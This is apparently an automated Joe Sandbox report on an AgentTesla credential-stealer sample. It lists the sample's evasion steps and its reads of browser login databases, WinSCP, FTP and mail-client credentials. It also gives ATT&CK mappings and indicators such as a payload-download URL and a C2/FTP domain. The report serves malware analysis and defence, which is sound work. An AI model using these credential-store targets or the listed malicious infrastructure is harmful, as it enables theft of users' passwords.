Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 596015	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595683	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595140	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594914	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594812	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594702	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594554	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Thread delayed: delay time: 594437	Jump to behavior

Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW}M^
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005B0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh3

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	API call chain: ExitProcess graph end node			graph_0-4507
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	API call chain: ExitProcess graph end node			graph_0-4513

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_00401752 lstrcatW,CompareFileTime,LdrInitializeThunk,SetFileTime,CloseHandle,lstrcatW,

0_2_00401752

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406252

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Process created: C:\Users\user\Desktop\u9aPQQIwhj.exe "C:\Users\user\Desktop\u9aPQQIwhj.exe"

Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Queries volume information: C:\Users\user\Desktop\u9aPQQIwhj.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405F0A

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\u9aPQQIwhj.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2936520542.0000000035FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: u9aPQQIwhj.exe PID: 7880, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	11 Process Injection	1 Masquerading	2 OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	1 Credentials in Registry	141 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	226 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
u9aPQQIwhj.exe	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://api.ipify.org/t	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
api.ipify.org	172.67.74.152	true	false	unknown
concaribe.com	192.185.13.234	true	true	unknown
ftp.concaribe.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown
http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.bin	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://84.38.133.42/SaclKvrenGmYaqCeKqHVn198.binY	u9aPQQIwhj.exe, 00000004.00000002.2919270117.0000000005AB7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg	u9aPQQIwhj.exe, 00000000.00000002.2410008030.0000000002763000.00000004.00000020.00020000.00000000.sdmp, nsw3DE5.tmp.0.dr, 660.jpg.0.dr	false		unknown
https://api.ipify.org	u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ftp.concaribe.com	u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_ErrorError	u9aPQQIwhj.exe	false	URL Reputation: safe	unknown
http://concaribe.com	u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035FDB000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.ipify.org/t	u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.microsoft	u9aPQQIwhj.exe, 00000004.00000002.2937245380.0000000038B21000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	u9aPQQIwhj.exe, 00000004.00000002.2936520542.0000000035F61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
84.38.133.42	unknown	Latvia	203557	DATACLUB-NL	false
192.185.13.234	concaribe.com	United States	46606	UNIFIEDLAYER-AS-1US	true
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546022
Start date and time:	2024-10-31 11:43:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	u9aPQQIwhj.exe renamed because original name is a hash value
Original Sample Name:	7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/9@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 160 Number of non-executed functions: 83
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: u9aPQQIwhj.exe

Simulations

Behavior and APIs

Time	Type	Description
06:45:30	API Interceptor	302x Sleep call for process: u9aPQQIwhj.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
84.38.133.42	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.42/FZBmQQQpasdj30.bin
192.185.13.234	draft bl_pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	concaribe.com/wp-includes/assets/GkRyQpLAQhPD144.bin
172.67.74.152	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	2zYP8qOYmJ.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	Proforma Invoice.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	#Uad6c#Ub9e4 #Uc8fc#Ubb38 658749 #Ubc0f 658752..exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.13.205
	phish_alert_sp2_2.0.0.0.eml	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	https://schiller.life/	Get hash	malicious	HTMLPhisher	Browse	104.26.12.205
	SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
UNIFIEDLAYER-AS-1US	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	192.185.13.234
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	162.241.63.77
	MP2318GJ-P 18000pcs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.185.118.238
	Receipt.htm	Get hash	malicious	Unknown	Browse	69.49.245.172
	SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exe	Get hash	malicious	FormBook	Browse	162.241.63.77
	http://timecode.com.ar/Webmail/2/Webmail/webmail.php?email=gc@virtualintelligencebriefing.com	Get hash	malicious	HTMLPhisher	Browse	192.185.20.145
	Shipping documents 00039984849900044800.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	192.185.13.234
	z1Transaction_ID_REF2418_cmd.bat	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	50.116.93.185
	z1SWIFT_MT103_Payment_552016_cmd.bat	Get hash	malicious	DBatLoader, FormBook	Browse	50.116.93.185
	Order Specifications for Materials.docx.vbs	Get hash	malicious	DBatLoader, FormBook	Browse	50.116.93.185
DATACLUB-NL	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.133.42
	QUOTE #46789_AL_JAMEELA24.exe	Get hash	malicious	Remcos, GuLoader	Browse	84.38.133.160
	Purchase Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	84.38.129.16
	Documenti di spedizione.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	84.38.129.16
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	185.29.11.116
	PO-94858.exe	Get hash	malicious	Snake Keylogger	Browse	185.29.11.116
	Order 10172024.bat.exe	Get hash	malicious	AgentTesla	Browse	185.29.11.116
	Order 10172024.bat.exe	Get hash	malicious	AgentTesla	Browse	185.29.11.116
	na.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	185.29.11.111
	Upit 220062.xls	Get hash	malicious	Remcos	Browse	185.29.11.111
CLOUDFLARENETUS	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	https://www.transfernow.net/dl/20241030KnXGth9f	Get hash	malicious	Unknown	Browse	104.26.15.166
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://flaviarc.com/vrecord%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/	Get hash	malicious	HTMLPhisher	Browse	104.18.3.157
	Eprdtdrqbr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	HT9324-25 1x40HC LDHFCLDEHAM29656 MRSU5087674.exe	Get hash	malicious	FormBook	Browse	172.67.177.220
	Proforma Invoice.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	24602711 Inv_Or.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	https://alaskan.s3.eu-north-1.amazonaws.com/muna.html?login=abc@everbridge.com&pcnt=3&no_redrct=no_redrct&request_type=cancel_request	Get hash	malicious	Unknown	Browse	172.67.74.152
	https://www.transfernow.net/dl/20241030KnXGth9f	Get hash	malicious	Unknown	Browse	172.67.74.152
	Contrato.exe	Get hash	malicious	DarkCloud	Browse	172.67.74.152
	Eprdtdrqbr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	N#U00b0 DE PEDIDO DE ABARROTES DE NOVIEMBRE 2024.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	Proforma Invoice.scr.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	MP2318GJ-P 18000pcs.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	172.67.74.152
	clipper.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.74.152

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	whatsappjpg.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	WEAREX_IHRACAT.exe	Get hash	malicious	GuLoader	Browse
	WEAREX_IHRACAT.exe	Get hash	malicious	GuLoader	Browse
	sample.exe	Get hash	malicious	FormBook, GuLoader	Browse
	sample.exe	Get hash	malicious	GuLoader	Browse
	8737768___19082024.vbs	Get hash	malicious	FormBook, GuLoader	Browse
	8737768___19082024.vbs	Get hash	malicious	GuLoader	Browse
	Q8QeOUbRK0.exe	Get hash	malicious	GuLoader	Browse
	Q8QeOUbRK0.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Settings.ini

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	4.558562939644915
Encrypted:	false
SSDEEP:	3:RlvjDkAQLQIfLBJXmgxv:R1ZQkIP2I
MD5:	A6216EF9FBE57B11DEEB1B1FD840C392
SHA1:	E554348623EF9ADDDE2FB3F2742D5CC1EF240AB1
SHA-256:	EDF6C9DA71DAF3B3DA2E89A1BC6B9F4B812F18FC133CF4706A3AE983E4040946
SHA-512:	AF5FDD8419B8384361BBEA7600B4DA7860771DD974D3B2D747C6E1C4F7E4DF49FE4BE5FA2320E9041343C8D2AB5912BE1CF279B61ED2A96954C1C2ED05AA0122
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Common]..Windows=user32::EnumWindows(i r1 ,i 0)..

C:\Users\user\AppData\Local\Temp\nsh4048.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	5.813979271513012
Encrypted:	false
SSDEEP:	192:eF2HS5ih/7i00dWz9T7PH6lOFcQMI5+Vw+bPFomi7dJWsP:rSUmlw9T7DmnI5+N273FP
MD5:	7399323923E3946FE9140132AC388132
SHA1:	728257D06C452449B1241769B459F091AABCFFC5
SHA-256:	5A1C20A3E2E2EB182976977669F2C5D9F3104477E98F74D69D2434E79B92FDC3
SHA-512:	D6F28BA761351F374AE007C780BE27758AEA7B9F998E2A88A542EEDE459D18700ADFFE71ABCB52B8A8C00695EFB7CCC280175B5EEB57CA9A645542EDFABB64F1
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Shipping documents 000293994900.exe, Detection: malicious, Browse Filename: whatsappjpg.exe, Detection: malicious, Browse Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse Filename: WEAREX_IHRACAT.exe, Detection: malicious, Browse Filename: sample.exe, Detection: malicious, Browse Filename: sample.exe, Detection: malicious, Browse Filename: 8737768___19082024.vbs, Detection: malicious, Browse Filename: 8737768___19082024.vbs, Detection: malicious, Browse Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse Filename: Q8QeOUbRK0.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....f.R...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..B....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsw3DE5.tmp

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	data
Category:	dropped
Size (bytes):	927942
Entropy (8bit):	5.501761489288064
Encrypted:	false
SSDEEP:	12288:7TrjZjiGBM/3Ptm9qGRd9lyHuqdKZKyYiErGp7HvDgK/:XO/ftmsedfOuVgdGp7PDgQ
MD5:	25A76CE5339D0D2B0BCF54E0D640BE94
SHA1:	741CB370E32C57F65A221106016AD15DEB5D1164
SHA-256:	D2BB13CACD56FFB3BF0B0286F1EC22C7D5109297D0286995F15A18D3865D72A5
SHA-512:	78F26A106A273ECA500F799B1AE02AB74FBF3169AEBDEEF27B57218B4F1668948A1F21F5845F44F796FEEB0AC33EC27FC386C63761267605A69FC31008AC3E47
Malicious:	false
Reputation:	low
Preview:	.B......,...............................$B.......B..........................o...............................................................................................................................................................................................................G...b...............j...............................................................................................................................S...........D...f...r...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Uploadable\normallnnens\Banebrydere.Spe107

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	data
Category:	dropped
Size (bytes):	437516
Entropy (8bit):	7.536847087289815
Encrypted:	false
SSDEEP:	6144:BRAiPjrWGBM5nf/3DUInCaur79qGdHd+aA48KyHPWBwwRZyI+6K0ebKa9OKyaxTP:BjiGBM/3Ptm9qGRd9lyHuqdKZKyYiE7
MD5:	A62CB80618398C90AFACDC9825A5D293
SHA1:	90ACCF3F0D9C9E8D53531A3106192D61D240CE81
SHA-256:	D67096FE71FAC97FEEF92248F7596F5F2B611583A8AC90B93B674C33F5F79257
SHA-512:	507CD9E21739638D051CFD15C1EA3F89728B900E9220361B76399AAB26FF444697CD55796D8E22F2E587AE823B85D2FF28E5D0F279AAE17102E08BAEF75E04CB
Malicious:	false
Reputation:	low
Preview:	...........(.WWW...............................:.............=........MMMMM.................................bbb..............TT....e...999......4444......++.....!...............................................................NNN.UU.rrr.......[......r.&.........333................................{..MM.ZZ..V....^^.##..,,,..qqqqq......'.......... ...........................................qq....z.Y..-...............dd..Q.ff....j.....66.]]]]..k.....SS.........FFF.......==...................!........ii....J.X...................D......................x..F.####..r....hhh................................aaaaa...............................................J...........!..gggg.......LL..................1............99.........#...................................................k.uu...................e.......................QQ.....''...........\\\...............................................////.==.\|....\......Y..V.........m.............KKKKKK.....n..%.......+....ff.......'.]].rr..._....=...r....

C:\Users\user\Uploadable\normallnnens\Trskelen\660.jpg

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, comment: "File source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg", baseline, precision 8, 550x309, components 3
Category:	dropped
Size (bytes):	32980
Entropy (8bit):	7.966258347557809
Encrypted:	false
SSDEEP:	768:FU6UE3Rk9Eo7uT/59xGBxipyyZ4D9iBao1htGs5AQ:y6UZE3D5v34D9wL1XGnQ
MD5:	976F85DF642FE509973BCC05E4A32C2B
SHA1:	7A36A94C45039A31FD7A0BAFFCC3ACA8E3AC656A
SHA-256:	68B60014573EF5042B6AB616B17BE733AF6E803EA7096036BC3A075790656233
SHA-512:	7EA1663835C92E178F3DFBA67BCA0DE52CD5690ED775A67A1A5163E0C4ECF309AA05742B6978206811A2BC95222A823AFE982C1A70D24FACF62A493D4078CDF7
Malicious:	false
Reputation:	low
